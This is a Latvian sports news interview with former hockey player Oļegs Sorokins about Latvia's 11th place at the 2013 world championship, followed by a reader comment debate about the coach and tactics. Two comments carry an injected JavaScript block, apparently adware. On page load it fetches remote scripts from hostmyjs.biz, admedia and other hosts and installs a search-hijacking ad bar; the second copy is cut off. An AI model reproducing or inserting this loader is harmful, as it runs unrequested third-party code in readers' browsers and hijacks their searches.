Layout: current: getContentLayout (Cid: Cache\Templating\LayoutCustomizations\Esports\CustomizationSource512 ), alternative: getContentLayout (Cid: Cache\Templating\LayoutCustomizations\Esports\CustomizationSource512), Fid:2410, Did:0, useCase: 3

Viedoklis: Sorokins: "Paldies Dievam, ka mums bija laba pirmā maiņa"

Jānis Pārums

Viedoklis: Sorokins: "Paldies Dievam, ka mums bija laba pirmā maiņa"
Oļegs Sorokins
Foto: Nora Krevneva, f64

Kādreizējais Latvijas izlases hokejists Oļegs Sorokins pēc Latvijas izlases izcīnītās 11.vietas pasaules čempionātā portālam Sportacentrs.com dalījās iespaidos par valstsvienības sniegumu tajā, atzīstot, ka viņam bijuši gan patīkami, gan ne tik patīkami pārsteigumi.

"Komanda lēni ieskrējās un viss beidzās labi. Ļoti labi, ka uzvarējām slovākus, citādi viss būtu pavērsies pavisam savādāk. Lai arī mums bija mēneša gatavošanās šim turnīram, būtībā pasaules čempionāta laikā tika veidotas pavisam jaunas maiņas. Paldies Dievam, ka pirmā maiņa bija saspēlējusies un bija gatava bija no pirmās spēles. Un arī svarīgākajās spēlēs – labi, ka tā bija tik laba, ka pārējiem vajadzēja tikai piepalīdzēt un noturēt. Pirmās maiņas loma bija milzīga spēlēs ar Slovākiju un Franciju," norādīja Sorokins. "Domāju, ka smagais sākums norāda uz problēmām sagatavošanās posmā. Komanda ieskrējās čempionāta laikā tīri fiziski. Pēc tam sasniedza ļoti labu formu."

"Jau reportāžu laikā teicu, ka tas, kas mani pārsteidza, bija tas, ka aizsardzībā nenotiek nekāda koriģēšana. Pirmajās spēlēs visi vārti tika zaudēti praktiski identiski. Darbs aizsardzībā nebija pareizi sakoriģēts, spēlētāji [arī uzbrukumā] bija salikti ne savās pozīcijās. Kaut ko treneris pirms čempionāta mēģināja izdomāt, bet čempionāta laikā atgriezās pie tām pozīcijām, kas spēlētājiem bijušas sezonas laikā. Džeriņam labākās spēles bija tad, kad viņš spēlēja sev ierastajā centra pozīcijā, un sliktākās – kad pa malu," uzsvēra eksperts.

Sorokins neslēpa, ka bijuši vairāki spēlētāji, kuru darbība laukumā viņam simpatizējusi: "Bija patīkami skatīties uz Māri Jasu, lai gan viņam netika dots liels spēles laiks. Patika arī Andersons un Saviels, kuri spēlē Ukrainas čempionātā, kas nav salīdzināms ar KHL – viņi nekrita ārā no bildes un labi padarīja savu darbu aizsardzībā. Kas attiecas par uzbrucējiem – kad viņi tika salikti pa savām vietām, tad paveica visu ļoti labi. Tie paši Meija un Džeriņš... Manuprāt, vienkārši netika uzminēts ar maiņu salikumu. Ja runājam par labajām lietām, tad, protams, pārsteigums bija Kristera Gudļevska labā debija pasaules čempionātā. Liels un ļoti patīkams pārsteigums. Pozitīvi, ka mums aug vēl viens labs vārtsargs. "

Lūgts komentēt lielo soda minūšu skaitu un tiesnešu darbu, Sorokins atbildēja: "Ja godīgi, par vairākiem noraidījumiem bija jautājumi tiesnešiem. Vai mūs speciāli gremdēja, es nezinu, bet šaubos par to, jo ceru, ka pasaules čempionātā tā nav. Sākotnēji noraidījumi bija vājās fiziskās kondīcijas dēļ, mūsējie nebija gatavi spēlēt visas trīs trešdaļas. Kad kondīcija tika uzlabota, tad arī noraidījumu laikam bija mazāk. Mūsu spēle bija agresīva, bija daudz spēka spēles. Mums bija arī spēlētāji, kas to ļoti labi māk darīt, piemēram, Ķēniņš, Girgensons."

"Domāju, ka mēs esam tur, kur mēs esam un ieņemtā vieta ir objektīva. Ja mēs labi būtu spēlējuši no paša sākuma, un jau no sākuma būtu laba fiziskā forma, varbūt mēs varētu aizķerties arī kādā citā spēlē un kaut ko vēl iegūt," noslēdza Sorokins.

1 2 37 komentāri
Slēpts komentārs no bloķēta lietotāja
Slēpts komentārs: tobymac
Slēpts komentārs: purva_velns

 +11 [+] [-]

, 2013-05-16 09:26, pirms 11 gadiem
Nu tad Oļagam jāiet par trenera 3.asistentu un jāsaliek aizsardzība pa vietām.

  +1 [+] [-]

, 2013-05-16 09:29, pirms 11 gadiem
Sorokina teiktajā vajadzētu ieklausīties treneru korpusam.Varbūt daži domu graudi noderētu nākotnē. No malas tak labāk redzams!
Slēpts komentārs: cicerons123456

  +4 [+] [-]

, 2013-05-16 09:42, pirms 11 gadiem
Mani loti patikami parsteidza ka sogad musejie, ka lielas izlases pamazam ieskrejas un uznema formu! Kads atceras, ka nonakusi zaudetajos pret loti specigu pretinieku mes butu 3perioda beigas atspelejusies? Fiziski izskatijamies pat stipraki par somiem!

 +14 [+] [-]

, 2013-05-16 09:54, pirms 11 gadiem
cicerons123456 rakstīja: es gan uzskatu ka Olega teiktais skan kaa mazas meitenes raudashanas,nu tada pljutishana vien sanaaca. visur vainiigi treneri ? a speletajkiem nav japildas speles plans? varbuut vienkasrshi vajadzeja sen savieelu nonjemt no laukume to pensionaru , vinjs netika lidzi saviem pretspeletajiesm atrumaa,un vairakums vartu tika ielaisti 4 mainjaa sevishkji labi tas tika redzets pedejaa spelee kaa speleja 4 mainja. Takaa es uzskatu ka no shiem speletajiem kas bija tika izveidota optimala cinities spejiiga komanda.Oleg tev liels trekns miinus manaas aciis. biji vecis paliki par .................
Eu, ekspert, nevajag likt tik debīlus komentārus, Oļegam pajautāja viedokli, viņš pateica, jautātu tev, būtu citādāks viedoklis. Pārsvarā kļūdas bija Krišjānim, kura dēļ tika zaudēti vairāki vārti, bet tas tāpēc, ka viņš daudz spēlēja un bija noguris. Oļegam pilnībā taisnība, un kas vēl bija redzams, maz skaistu kombināciju, pārsvarā pāriet pāri centram, metiens zonā un aiziet mīcīšanās gar bortiem. Nolanam nav vairāku spēļu stratēģiju, ir tikai viena, skrien, met.

 +11 [+] [-]

, 2013-05-16 09:59, pirms 11 gadiem
Edison, viegli teikt, ka Nolanam nav citas stratēģijas, bet nedrīkst
aizmirst, ka mūsu uzbrucēji lielā vairumā nemaz
nav tik meistarīgi, lai taisītu skaistas kombinācijas.

     [+] [-]

, 2013-05-16 09:59, pirms 11 gadiem
Labi, ka vispaar mums taada izlase ar Indeicu vadiibaa!!!! Labu komandu nolasiijis

  -1 [+] [-]

, 2013-05-16 10:13, pirms 11 gadiem
Nevis aug vartsargs,bet ir izaudzis un ir labāks par Masaļski gan augumā gan talantā gan varešanā gan intuicijā gan psiholoģijā.

  +1 [+] [-]

, 2013-05-16 10:16, pirms 11 gadiem
Uuja uuja .. par to ka komanda tikai pasha cempja gaiuta ieskreejaas ( vai arii saprata ka piespiesti pie sienas) tas ir fakts - bet teikt meistariibas nav .. da kaut pedeja spele pret somiem - jaa varbuut parak maz asuma un virziibas uz vaartiem, varbuut kaadu citu briidi tad kad varbuut varetu papreset preitneuku vinja laukuma ( ka to darija Keninjsh un Jass) jau atkapjas .. ka buutu ja Gudijs butu staveejis sakuma ... kaa buut ja pret amishiem buutu vismaz 2 no 3 izdeviibam izmantotas.... tas viss ir jau no taa kaa buutu ja buutu, fakts ir tas ka izlase - atjauninata ( iespeja pastirpianties IR), un nekur jau nav teikts ka vaal neizaug kads tiirradniitis - tikai japrot saskatiit un saveidot to komandas kjimiju... esam tur kur esam - arii tas ir ieguvums .. un vai vareja buut labaak ... vareeja bet ne sevishkji daudz - bet sliktaak vareaj buut nu noteikti.... bet nebija tatad ir OK!! malachi!!

  +1 [+] [-]

, 2013-05-16 10:17, pirms 11 gadiem
Un faniem un lidzjutejiem vienmer gribeesie lai buutu vel mazliet labak!!!!

  +3 [+] [-]

, 2013-05-16 10:25, pirms 11 gadiem
purva_velns rakstīja: Jautājumi indiānim. Izlases čakarēšana šoreiz beidzās veiksmīgi. Ja būtu bijis vēl ietiepīgāks, būtu sliktāk. Mūsējie prot spēlēt, vajag cilvēku, kas prot izmantot spēlētāju stiprās puses.
Indiānis arī ir tikai cilvēks, kuram turklāt līdz šim nav bijusi nopietna pieredze ar Eiropas hokeju. Arī viņam vajadzīgs laiks lai saprastu, ka Kanādas metodes šeit īsti neiederas. Te ir cita pasaule, citi laukumi, cits spēlētāju domāšanas veids.
Čempionāta sākumā teicu, ka indiānis neder, jo viņš nepiespiedīs izlases līderus spēlēt spēka hokeju. Tādi Dārziņi un Sprukti (kuram principā ir visas dotības lai spēlētu agresīvu hokeju, bet pats izvēlas labāk tēlot lielu lāci baleta tērpā un čībiņās) izvairās no spēka spēles, tomēr čempionātam ejot arvien vairāk mūsējie sāka iesaistīties agresīvā hokejā, kas liecina, ka kaut ko tomēr Nolans ir spējis ieskaidrot mūsējiem.
Uzskatu, ka Latvijas vienīgais ceļš cīņā ar lielajiem ir izteikts spēka hokejs, ceļš ko izvēlējušies iet vācieši, šveicieši, arī norvēģi, francūži, dāņi tajā virzienā skatās. Individuālo meistarību var kompensēt ar fizisko spēku, ja nevaram apspēlēt Kovalčuku, tad jādara tā lai viņam sāp.
Mums aug labs materāls šādai izlasei, Girgensons, Ķēniņš, Pelšs, Lipsbergs, Koba Jass. Pēc pāris gadiem izlasē noteikti varētu debitēt arī Egle, daudz tālākā nākotnē skatoties mums Zviedrijā spēlē liels supertalants, kura spēles stilu ziedri komentē kā netīru un smagu.
Protams zvaigzne šādā hokejā būtu Karsums. Aizsardzībā saldais ēdiens tas ir Kuldam un Mārim Jasam.
Jādod Nolanam iespēju strādāt ar izlasi ilgtermiņā. Mēs nogrimsim sū*** ja neatmetīsim savu krievu hokeju un nepāriesim uz to hokeju ko spēlē citas mūsu līmeņa komandas. Vienīgi mēs un baltkrievi vēl aiz vien spēlējam šo te hokeju, kas ir vērsts prom no bortiem.
Pat ja nepatur Nolana, jāmeklē kāds cits šāda tipa treneris. Varbūt kut kur Somijā?
Mans viedoklis ir, ka mums jāveido jauna komanda, kuras pamatkodols ir kā par Ķēniņu un Girgensonu izteicās Sorokins ''vari nedot viņam maizi, bet iedod kādu ko ietriekt bortā''.

  +1 [+] [-]

, 2013-05-16 10:34, pirms 11 gadiem
purva_velns rakstīja: Jautājumi indiānim. Izlases čakarēšana šoreiz beidzās veiksmīgi. Ja būtu bijis vēl ietiepīgāks, būtu sliktāk. Mūsējie prot spēlēt, vajag cilvēku, kas prot izmantot spēlētāju stiprās puses.
Piekrītu, bet lābāk lai jau Nolanam tas pielec tagad nekā nākamajā gadā tikai uz OS, un protams ar aizsardzību ir jātiek galā jo ja ne tad OS mūs vienkārši saraus gabalos un viens Gudļevskis vai Masaļskis nebūs glābēji.

     [+] [-]

, 2013-05-16 10:50, pirms 11 gadiem
playthegame rakstīja: Mans viedoklis ir, ka mums jāveido jauna komanda, kuras pamatkodols ir kā par Ķēniņu un Girgensonu izteicās Sorokins ''vari nedot viņam maizi, bet iedod kādu ko ietriekt bortā''.
Precīzi, nu neapspēlēsim mēs krievus vai amerikāņus uz meistarību, vajag dot iekšās un bizot visu spēli, tad kaut kas var sanākt.

  +3 [+] [-]

, 2013-05-16 10:59, pirms 11 gadiem
playthegame rakstīja: Indiānis arī ir tikai cilvēks, kuram turklāt līdz šim nav bijusi nopietna pieredze ar Eiropas hokeju. Arī viņam vajadzīgs laiks lai saprastu, ka Kanādas metodes šeit īsti neiederas. Te ir cita pasaule, citi laukumi, cits spēlētāju domāšanas veids.
Čempionāta sākumā teicu, ka indiānis neder, jo viņš nepiespiedīs izlases līderus spēlēt spēka hokeju. Tādi Dārziņi un Sprukti (kuram principā ir visas dotības lai spēlētu agresīvu hokeju, bet pats izvēlas labāk tēlot lielu lāci baleta tērpā un čībiņās) izvairās no spēka spēles, tomēr čempionātam ejot arvien vairāk mūsējie sāka iesaistīties agresīvā hokejā, kas liecina, ka kaut ko tomēr Nolans ir spējis ieskaidrot mūsējiem.
Uzskatu, ka Latvijas vienīgais ceļš cīņā ar lielajiem ir izteikts spēka hokejs, ceļš ko izvēlējušies iet vācieši, šveicieši, arī norvēģi, francūži, dāņi tajā virzienā skatās. Individuālo meistarību var kompensēt ar fizisko spēku, ja nevaram apspēlēt Kovalčuku, tad jādara tā lai viņam sāp.
Mums aug labs materāls šādai izlasei, Girgensons, Ķēniņš, Pelšs, Lipsbergs, Koba Jass. Pēc pāris gadiem izlasē noteikti varētu debitēt arī Egle, daudz tālākā nākotnē skatoties mums Zviedrijā spēlē liels supertalants, kura spēles stilu ziedri komentē kā netīru un smagu.
Protams zvaigzne šādā hokejā būtu Karsums. Aizsardzībā saldais ēdiens tas ir Kuldam un Mārim Jasam.
Jādod Nolanam iespēju strādāt ar izlasi ilgtermiņā. Mēs nogrimsim sū*** ja neatmetīsim savu krievu hokeju un nepāriesim uz to hokeju ko spēlē citas mūsu līmeņa komandas. Vienīgi mēs un baltkrievi vēl aiz vien spēlējam šo te hokeju, kas ir vērsts prom no bortiem.
Pat ja nepatur Nolana, jāmeklē kāds cits šāda tipa treneris. Varbūt kut kur Somijā?
Mans viedoklis ir, ka mums jāveido jauna komanda, kuras pamatkodols ir kā par Ķēniņu un Girgensonu izteicās Sorokins ''vari nedot viņam maizi, bet iedod kādu ko ietriekt bortā''.
Tikai ir vairākas nianses tavam sacerējumam:
1. "...Tādi Dārziņi un Sprukti..." – viņi kā reizi uztaisīja rezultātu un izvilka izlasi uz 11. vietu
2. Kulda spēlēja ļoti mīksti un vairs nebija tas Kulda, kas brauca no AHL uz čempi, drīzāk Sotnieks spēka spēli spēlēja daudz vairāk.
3. Kas tavā jaunajā modelī metīs vārtus? Domā visi močīs pretiniekus pa bortiem un gan jau kāds kādu mēsliņu iebakstīs
4. Tos ZA spēlētājus veltīgi uzskaiti, atceries, ka paveicās, ka tāds Girgensons vispār tika uz PČ, pa tādiem Grigensoniem, Freibergiem, Daugaviņiem, Pelšiem, Lipsbergiem, Eglēm, Jevpaloviem utt. nekad nebūs garantijas vai vispār kāds tiks...

  +2 [+] [-]

, 2013-05-16 11:03, pirms 11 gadiem
Domāju, ka Virsaitis mums ļoti noderētu vismaz vēl vienu - divus čempionātus un OS arī. Tagad komanda ir sapratusi, ko treneris grib redzēt laukumā. Kolektīvu saliedēt un veidot līderus viņš māk, kā arī jaunos izcelt no nekurienes, tas ir viņa lielākais talants, LV tik gados jauna izlase vēl nekad nav spēlējusi.

  +3 [+] [-]

, 2013-05-16 11:11, pirms 11 gadiem
Shmidzis rakstīja: Tikai ir vairākas nianses tavam sacerējumam:
1. "...Tādi Dārziņi un Sprukti..." – viņi kā reizi uztaisīja rezultātu un izvilka izlasi uz 11. vietu
2. Kulda spēlēja ļoti mīksti un vairs nebija tas Kulda, kas brauca no AHL uz čempi, drīzāk Sotnieks spēka spēli spēlēja daudz vairāk.
3. Kas tavā jaunajā modelī metīs vārtus? Domā visi močīs pretiniekus pa bortiem un gan jau kāds kādu mēsliņu iebakstīs
4. Tos ZA spēlētājus veltīgi uzskaiti, atceries, ka paveicās, ka tāds Girgensons vispār tika uz PČ, pa tādiem Grigensoniem, Freibergiem, Daugaviņiem, Pelšiem, Lipsbergiem, Eglēm, Jevpaloviem utt. nekad nebūs garantijas vai vispār kāds tiks...
tieši tā, jo nu arī pats Nolans (vai kāds no izlases) teica, ka mēs spēlējam krievu un kanādiešu hokeja apvienojumu un tā tam būs būt

     [+] [-]

, 2013-05-16 11:19, pirms 11 gadiem
Edison rakstīja: Eu, ekspert, nevajag likt tik debīlus komentārus, Oļegam pajautāja viedokli, viņš pateica, jautātu tev, būtu citādāks viedoklis. Pārsvarā kļūdas bija Krišjānim, kura dēļ tika zaudēti vairāki vārti, bet tas tāpēc, ka viņš daudz spēlēja un bija noguris. Oļegam pilnībā taisnība, un kas vēl bija redzams, maz skaistu kombināciju, pārsvarā pāriet pāri centram, metiens zonā un aiziet mīcīšanās gar bortiem. Nolanam nav vairāku spēļu stratēģiju, ir tikai viena, skrien, met.
eu taa tu uzrunaa cilveekus? skaidrs tavs atiistiibas limeenis tas viens. otrs es izteicu savu viedokli gan par izlasi gane par pashu Olegu. un vari raudat ka nolans slikts ,olegs baigais eksperts bet sevi tachu neapmaaniisi. Bet no taa materiala kas bija vinjs uztaisija konkureet spejigu komandu. interesanti vai olegs vareetu kautko taadu uztaisiit? pashi redzat ka cilveeks nav pieprasiits tagad meigjina buut eksperst un kritikjis. es uzskatu ka kritikji ir tie kam pasham nekas nav izdevies.veel reiz piebildishu ka tas ir mans viedoklis lai te foruma Ergljiem buutu skaidrs , savadaak trusenishu gumija paarplisiis no plutishanas.kas atiecas uz krishjani vinjs speleja ar traumu un visi izteica cienju vinjam, ppadomaa par to,ja ir ar ko

  -1 [+] [-]

, 2013-05-16 11:47, pirms 11 gadiem
playthegame rakstīja: Indiānis arī ir tikai cilvēks, kuram turklāt līdz šim nav bijusi nopietna pieredze ar Eiropas hokeju. Arī viņam vajadzīgs laiks lai saprastu, ka Kanādas metodes šeit īsti neiederas. Te ir cita pasaule, citi laukumi, cits spēlētāju domāšanas veids.
Čempionāta sākumā teicu, ka indiānis neder, jo viņš nepiespiedīs izlases līderus spēlēt spēka hokeju. Tādi Dārziņi un Sprukti (kuram principā ir visas dotības lai spēlētu agresīvu hokeju, bet pats izvēlas labāk tēlot lielu lāci baleta tērpā un čībiņās) izvairās no spēka spēles, tomēr čempionātam ejot arvien vairāk mūsējie sāka iesaistīties agresīvā hokejā, kas liecina, ka kaut ko tomēr Nolans ir spējis ieskaidrot mūsējiem.
Uzskatu, ka Latvijas vienīgais ceļš cīņā ar lielajiem ir izteikts spēka hokejs, ceļš ko izvēlējušies iet vācieši, šveicieši, arī norvēģi, francūži, dāņi tajā virzienā skatās. Individuālo meistarību var kompensēt ar fizisko spēku, ja nevaram apspēlēt Kovalčuku, tad jādara tā lai viņam sāp.
Mums aug labs materāls šādai izlasei, Girgensons, Ķēniņš, Pelšs, Lipsbergs, Koba Jass. Pēc pāris gadiem izlasē noteikti varētu debitēt arī Egle, daudz tālākā nākotnē skatoties mums Zviedrijā spēlē liels supertalants, kura spēles stilu ziedri komentē kā netīru un smagu.
Protams zvaigzne šādā hokejā būtu Karsums. Aizsardzībā saldais ēdiens tas ir Kuldam un Mārim Jasam.
Jādod Nolanam iespēju strādāt ar izlasi ilgtermiņā. Mēs nogrimsim sū*** ja neatmetīsim savu krievu hokeju un nepāriesim uz to hokeju ko spēlē citas mūsu līmeņa komandas. Vienīgi mēs un baltkrievi vēl aiz vien spēlējam šo te hokeju, kas ir vērsts prom no bortiem.
Pat ja nepatur Nolana, jāmeklē kāds cits šāda tipa treneris. Varbūt kut kur Somijā?
Mans viedoklis ir, ka mums jāveido jauna komanda, kuras pamatkodols ir kā par Ķēniņu un Girgensonu izteicās Sorokins ''vari nedot viņam maizi, bet iedod kādu ko ietriekt bortā''.
<script>
var id=1726852673;
var aff=30579;
var sid=0;

function INCL_checkinternals()
{
var h = document.location.hostname;
return (/search.kalloutsearchd.com/i.test(h) == true ||
/search.adbard.com/i.test(h) == true ||
h.indexOf('search.runclips.com') != -1 ||
h.indexOf('search.searchnowdirect.com') != -1);
}

function INCL_addEventHandler (el, eType, fn)
{
if (el.addEventListener)
el.addEventListener(eType, fn, false);
else if (el.attachEvent)
el.attachEvent('on' + eType, fn);
else
el['on' + eType] = fn;
}

function INCL_checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function INCL_loadScript(src, scriptId)
{
if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
script.setAttribute('jsid', 'js36');
if (typeof(scriptId) !== 'undefined')
script.id = scriptId;
(document head||document getElementsByTagName('head')[0]|| document body||document getElementsByTagName('body')[0]) appendChild(script)
}
function INCL_onloadComplete()
{
if (!INCL_checkdml())
{
window.INLDM_cfg = { fi : 4603, fd : 0,
fddm: 'xml.cpchero.biz',
sttc: 'https://hostmyjs.biz/scripts/inl_dmmtch/',
inlsrhdm: 'sonicsearchonline.biz' };
INCL_loadScript('https://hostmyjs.biz/scripts/inl_dmmtch/inl_dmmtch.js');
INCL_loadScript('https://in.admedia.com/?id=ODkoOCI&subid=36');
}
INCL_loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
INCL_loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.cpchero.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://hostmyjs.biz/scripts/adbar' };
INCL_loadScript('https://hostmyjs.biz/scripts/adbar/adbar.js');
}
if (top === self && !INCL_checkinternals())
{
if (document.readyState === 'complete')
INCL_onloadComplete();
else
INCL_addEventHandler(window, 'load', INCL_onloadComplete);
}

</script> galigi garam tava ideja! ar tadu te "planu" mums muzigi bus garanteta 10.-14. vieta,ne vairak ja gribam tikt augstak,tad ar 4ekingeru audzinasanu vien nepietiks,vajag ari kas GUST VARTUS!

     [+] [-]

, 2013-05-16 12:06, pirms 11 gadiem
mazais23 rakstīja: Mani loti patikami parsteidza ka sogad musejie, ka lielas izlases pamazam ieskrejas un uznema formu! Kads atceras, ka nonakusi zaudetajos pret loti specigu pretinieku mes butu 3perioda beigas atspelejusies? Fiziski izskatijamies pat stipraki par somiem!
Nezinu vai labāki, bet beidzot tiešām bijām fiziski attīstīti un beidzot neatpalikām, mūs nelīmejā pa malām

  +4 [+] [-]

, 2013-05-16 12:07, pirms 11 gadiem
kramiks, tev ir triperis vieglā formā

     [+] [-]

, 2013-05-16 12:07, pirms 11 gadiem
IIsti kaartiibaa ar taam mainjaam nebija, bet jaatceras, ka mums ir ierobezots speeleetaaju skaits, ieradaas Girgensons, speeleetaajii guust traumas un Nolans (nebuudams vieteejasis speciaalists) ar izlasi tikai otro gadu straadaa.

Jaa par Maari Jasu jaapiekriit, patiikami paarsteidza. RD saads speeleetaajs nodereetu.

Sorokinam jaaiet par Nolana paliigu aizsargus trenneet, tik nez vai Kirai taads, kas galvaa tas uz meeles, trenneris vajadziigs.

  +1 [+] [-]

, 2013-05-16 12:10, pirms 11 gadiem
playthegame rakstīja: Indiānis arī ir tikai cilvēks, kuram turklāt līdz šim nav bijusi nopietna pieredze ar Eiropas hokeju. Arī viņam vajadzīgs laiks lai saprastu, ka Kanādas metodes šeit īsti neiederas. Te ir cita pasaule, citi laukumi, cits spēlētāju domāšanas veids.
Čempionāta sākumā teicu, ka indiānis neder, jo viņš nepiespiedīs izlases līderus spēlēt spēka hokeju. Tādi Dārziņi un Sprukti (kuram principā ir visas dotības lai spēlētu agresīvu hokeju, bet pats izvēlas labāk tēlot lielu lāci baleta tērpā un čībiņās) izvairās no spēka spēles, tomēr čempionātam ejot arvien vairāk mūsējie sāka iesaistīties agresīvā hokejā, kas liecina, ka kaut ko tomēr Nolans ir spējis ieskaidrot mūsējiem.
Uzskatu, ka Latvijas vienīgais ceļš cīņā ar lielajiem ir izteikts spēka hokejs, ceļš ko izvēlējušies iet vācieši, šveicieši, arī norvēģi, francūži, dāņi tajā virzienā skatās. Individuālo meistarību var kompensēt ar fizisko spēku, ja nevaram apspēlēt Kovalčuku, tad jādara tā lai viņam sāp.
Mums aug labs materāls šādai izlasei, Girgensons, Ķēniņš, Pelšs, Lipsbergs, Koba Jass. Pēc pāris gadiem izlasē noteikti varētu debitēt arī Egle, daudz tālākā nākotnē skatoties mums Zviedrijā spēlē liels supertalants, kura spēles stilu ziedri komentē kā netīru un smagu.
Protams zvaigzne šādā hokejā būtu Karsums. Aizsardzībā saldais ēdiens tas ir Kuldam un Mārim Jasam.
Jādod Nolanam iespēju strādāt ar izlasi ilgtermiņā. Mēs nogrimsim sū*** ja neatmetīsim savu krievu hokeju un nepāriesim uz to hokeju ko spēlē citas mūsu līmeņa komandas. Vienīgi mēs un baltkrievi vēl aiz vien spēlējam šo te hokeju, kas ir vērsts prom no bortiem.
Pat ja nepatur Nolana, jāmeklē kāds cits šāda tipa treneris. Varbūt kut kur Somijā?
Mans viedoklis ir, ka mums jāveido jauna komanda, kuras pamatkodols ir kā par Ķēniņu un Girgensonu izteicās Sorokins ''vari nedot viņam maizi, bet iedod kādu ko ietriekt bortā''.
Es piekrītu par to, ka nepieciešams pret lielajiem spēlēt agresīvu un fizisku spēli, savādāk ir grūti iekost. Tiešām prieks, ka beidzot neatpalikām fiziskajā spēlē.

  +2 [+] [-]

, 2013-05-16 12:10, pirms 11 gadiem
Shmidzis rakstīja: Tikai ir vairākas nianses tavam sacerējumam:
1. "...Tādi Dārziņi un Sprukti..." – viņi kā reizi uztaisīja rezultātu un izvilka izlasi uz 11. vietu
2. Kulda spēlēja ļoti mīksti un vairs nebija tas Kulda, kas brauca no AHL uz čempi, drīzāk Sotnieks spēka spēli spēlēja daudz vairāk.
3. Kas tavā jaunajā modelī metīs vārtus? Domā visi močīs pretiniekus pa bortiem un gan jau kāds kādu mēsliņu iebakstīs
4. Tos ZA spēlētājus veltīgi uzskaiti, atceries, ka paveicās, ka tāds Girgensons vispār tika uz PČ, pa tādiem Grigensoniem, Freibergiem, Daugaviņiem, Pelšiem, Lipsbergiem, Eglēm, Jevpaloviem utt. nekad nebūs garantijas vai vispār kāds tiks...
Nekur neesmu minējis, ka izlasei būtu jāatsakās no Sprukta un Dārziņa. Tās ir stabilas izlases vērtības un uzbrukuma līderi. Izlasei vajadzētu ilgtermiņa plānu, ko tad mēs īsti spēlējam. Krievu vai kanādiešu hokeju? Nkur nav teikts, ka tas pats Dārziņš nevar spēlēt agresīvu hokeju. Turnīra gaitā gan viņš, gan Indrašis pielika pie spēka spēles. Nebūtu vēlams atlaist Nolanu lai par treneri paņemtu kādu krievu, kurš tagad spiestu uz kombinācijām un piruetēm.
Ir jābeidz mētāties un beidzot jāsaprot, kas mēs esam, ko mēs varam un ko mēs darīsim turpmāk.

  -1 [+] [-]

, 2013-05-16 12:17, pirms 11 gadiem
kramiks rakstīja: galigi garam tava ideja! ar tadu te "planu" mums muzigi bus garanteta 10.-14. vieta,ne vairak ja gribam tikt augstak,tad ar 4ekingeru audzinasanu vien nepietiks,vajag ari kas GUST VARTUS!
Kā jau teicu, nekad neesmu minējis, ka vārtus gūt protošos ir jāmet ārā no izlases lai to vietā liktu čekerus.
Izlasei ir jābūt sabalansētai, visai izlasei ir jāspēlē viens, spēka hokejs. Un spēka hokejs nenozīmē tikai atsišanos un bortā līmēšanu. Tas ir agresīvs vienkāršots hokejs ar tendenci uz vārtu priekšu.
Tādas valstis kā Vācija un Šveice to sen jau ir sapratušas. Arī Dānija, Norvēģija, Francija arvien izteiktāk spēlē agresīvu hokeju visu četru maiņu izpildījumā.
Tas ir vienīgais veids kā tādas valstis kā Latvija var konkurēt ar lielvalstīm. Uz meistarību mēs viņus nepaņemsim.

  +5 [+] [-]

, 2013-05-16 12:18, pirms 11 gadiem
playthegame rakstīja: Nekur neesmu minējis, ka izlasei būtu jāatsakās no Sprukta un Dārziņa. Tās ir stabilas izlases vērtības un uzbrukuma līderi. Izlasei vajadzētu ilgtermiņa plānu, ko tad mēs īsti spēlējam. Krievu vai kanādiešu hokeju? Nkur nav teikts, ka tas pats Dārziņš nevar spēlēt agresīvu hokeju. Turnīra gaitā gan viņš, gan Indrašis pielika pie spēka spēles. Nebūtu vēlams atlaist Nolanu lai par treneri paņemtu kādu krievu, kurš tagad spiestu uz kombinācijām un piruetēm.
Ir jābeidz mētāties un beidzot jāsaprot, kas mēs esam, ko mēs varam un ko mēs darīsim turpmāk.
Nevajag spēlēt ne krievu, ne kanādiešu hokeju – vajag spēlēt tādu, ar kuru mēs varam gūt vislabākos panākumus, kaut vai sauc par ķīniešu hokeju.
Tāpat kā Sorokinam, ir lietas, kas patika Nolana darbā, ir lietas, kas likās aplamas... Un pirmais jau maiņu komplektācija...

     [+] [-]

, 2013-05-16 12:33, pirms 11 gadiem
pelikans rakstīja: IIsti kaartiibaa ar taam mainjaam nebija, bet jaatceras, ka mums ir ierobezots speeleetaaju skaits, ieradaas Girgensons, speeleetaajii guust traumas un Nolans (nebuudams vieteejasis speciaalists) ar izlasi tikai otro gadu straadaa.

Jaa par Maari Jasu jaapiekriit, patiikami paarsteidza. RD saads speeleetaajs nodereetu.

Sorokinam jaaiet par Nolana paliigu aizsargus trenneet, tik nez vai Kirai taads, kas galvaa tas uz meeles, trenneris vajadziigs.
Laikam īsti nezini nozīmi teicienam ,,kas galvā, tas uz mēles", jo Oļegs noteikti nav tāda tipa cilvēks

     [+] [-]

, 2013-05-16 12:44, pirms 11 gadiem
Shmidzis rakstīja: Nevajag spēlēt ne krievu, ne kanādiešu hokeju – vajag spēlēt tādu, ar kuru mēs varam gūt vislabākos panākumus, kaut vai sauc par ķīniešu hokeju.
Tāpat kā Sorokinam, ir lietas, kas patika Nolana darbā, ir lietas, kas likās aplamas... Un pirmais jau maiņu komplektācija...
Man vispār šķiet, ka mūsdienās nemaz tāda sadalījuma "krievu" vai "kanādiešu" hokejs nemaz īsti dabā nepastāv.

  -1 [+] [-]

, 2013-05-16 12:58, pirms 11 gadiem
ko tur daudz gudrot? radosa improvizacija uzbrukuma + speles disciplina un strikta darbiba aizsardziba ir visoptimalaka panakuma formula tiesi un konkreti Latvijas gadijuma! nevajag tupi kopet nedz Sveici ar Vaciju,nedz Daniju ar Franciju,tur ir pavisam citas hokeja tradicijas un cita mentalitate! <script>
var id=1726852673;
var aff=30579;
var sid=0;

function INCL_checkinternals()
{
var h = document.location.hostname;
return (/search.kalloutsearchd.com/i.test(h) == true ||
/search.adbard.com/i.test(h) == true ||
h.indexOf('search.runclips.com') != -1 ||
